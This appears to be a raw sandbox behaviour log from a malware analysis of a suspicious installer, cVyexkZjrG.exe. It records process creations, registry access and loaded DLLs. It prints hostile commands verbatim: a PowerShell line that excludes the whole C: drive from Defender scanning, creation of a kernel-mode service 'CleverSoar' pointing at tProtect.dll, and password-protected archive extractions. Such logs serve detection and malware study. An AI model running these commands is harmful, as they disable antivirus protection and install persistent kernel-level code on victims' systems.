Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5488:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2284:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1896:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3752:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6576:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6660:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6672:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3668:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2164:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6488:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:768:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7056:120:WilError_03
Source: C:\Users\user\Desktop\cVyexkZjrG.exeFile created: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmpJump to behavior
Source: C:\Users\user\Desktop\cVyexkZjrG.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\cVyexkZjrG.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\cVyexkZjrG.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\cVyexkZjrG.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\cVyexkZjrG.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
Source: cVyexkZjrG.exeVirustotal: Detection: 8%
Source: cVyexkZjrG.exeString found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\cVyexkZjrG.exeFile read: C:\Users\user\Desktop\cVyexkZjrG.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\cVyexkZjrG.exe "C:\Users\user\Desktop\cVyexkZjrG.exe"
Source: C:\Users\user\Desktop\cVyexkZjrG.exeProcess created: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmp "C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmp" /SL5="$20428,6416153,845824,C:\Users\user\Desktop\cVyexkZjrG.exe"
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpProcess created: C:\Users\user\Desktop\cVyexkZjrG.exe "C:\Users\user\Desktop\cVyexkZjrG.exe" /VERYSILENT
Source: C:\Users\user\Desktop\cVyexkZjrG.exeProcess created: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp "C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp" /SL5="$40436,6416153,845824,C:\Users\user\Desktop\cVyexkZjrG.exe" /VERYSILENT
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\Desktop\cVyexkZjrG.exeProcess created: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmp "C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmp" /SL5="$20428,6416153,845824,C:\Users\user\Desktop\cVyexkZjrG.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpProcess created: C:\Users\user\Desktop\cVyexkZjrG.exe "C:\Users\user\Desktop\cVyexkZjrG.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\Desktop\cVyexkZjrG.exeProcess created: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp "C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp" /SL5="$40436,6416153,845824,C:\Users\user\Desktop\cVyexkZjrG.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9ialdJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\cVyexkZjrG.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\cVyexkZjrG.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: slc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
